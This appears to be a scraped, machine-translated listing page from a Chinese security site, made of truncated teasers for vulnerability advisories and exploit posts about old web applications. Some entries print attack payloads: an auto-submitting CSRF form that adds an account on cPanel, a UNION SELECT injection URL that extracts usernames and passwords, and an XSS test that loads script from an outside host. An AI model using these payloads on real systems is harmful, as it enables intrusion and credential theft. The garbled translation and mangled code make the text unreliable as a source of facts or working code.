A malicious user can impersonate an official address by registering a prefix of it as a name.

Lines of code Vulnerability details Impact Detailed description of the impact of this finding. A malicious user can impersonate an official address by registering a prefix of it as a name. This is possible because parseAndResolve will first parse an address-style name as address first, and when i...

Gbbs micro Forum v3. 1. 4 injection vulnerability-vulnerability warning-the black bar safety net

Official address: http://www.softatm.com Vulnerability to prove:/css/ss.txt Program download: http://down.chinaz.com/soft/33484.htm Vulnerability files /userinfo. asp 7 2 row 7 row 4 Vulnerability type: character type injection Vulnerability information: p%yhm = request"yhm" set rs=server...

Most soil buy the system blind and cookie spoofing vulnerability analysis-vulnerability warning-the black bar safety net

Release date: 2010-10. 2 3 Publishing author: l4yn3 Affected versions: unknown Official address: http://www.zuitu.com/ Vulnerability type: Cookie spoofing, SQL injection Vulnerability Description: The most soil group purchase system is a domestic famous group purchase program in the domestic grou...

BeeSns microblogging system V0. 2 elevation of Privilege oday+exp and fix-vulnerability warning-the black bar safety net

| Publishing author: sub-meter Affected versions: BeeSns V0. 2 Official address: Vulnerabilitydescription: IP filter is not strict,causing the user can submit malicious parameters to enhance their own privileges This microblogging system style nice, personally prefer, the look code is found some...

Cpanel v11. 2 5 CSRF add administrator account exp-vulnerability warning-the black bar safety net

Cpanel v11. 2 5 CSRF add admin account vulnerability. Exploite: html body onload="javascript:fireForms" form method="POST" name="form0" action=" http://server:2082/frontend/x3/ftp/doaddftp.html" input type="hidden" name="login" value="name"/ input type="hidden" name="password" value="pass"/ input...

phpaaCms v0. 3. 1 SQL injection vulnerability-vulnerability warning-the black bar safety net

PHPAA show.php injection vulnerability Injection test http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concatusername,0x3a,password,1 2,1 3,1 4,1 5 from cmsusers-- Affected versions: FooSun 5.0 Official address: http://www.phpaa.cn...

1 1 4. Site Navigation Station system of V1. 1 3 XSS cross-site attacks-vulnerability warning-the black bar safety net

url-submit/index. php to submit the data is not filtered directly into the database,resulting in a savings ofXSSvulnerability Test method: In the Site Name column fill in thescript src=http://www. hackqing. cn/qingexp. js/script（src is fill in your own js file for the address,don't tell me that t...

Ebits Online SQL injection and upload vulnerabilities-vulnerability warning-the black bar safety net

Ebits Online program exist two vulnerabilities, the weddingtopics. php page the filter is not carefully generatedSQL injectionattack uploadimages. php page in you can upload any file. SQL injection: = SQL injectionstatement For example: -- Upload vulnerability: Official address: Note: author: iMe...

PHPAuctionSystem registration file upload vulnerability-vulnerability warning-the black bar safety net

·PHPAuctionSystem registration file upload vulnerability PHPAuctionSystem registered members sign in the presence of arbitrary file upload vulnerability. Step 1: register as a user:） Step 2: Go to the/visit the sell item option Demo URL: http:// www.hack58.com/ selectcategory.php it? Step 3: Uplo...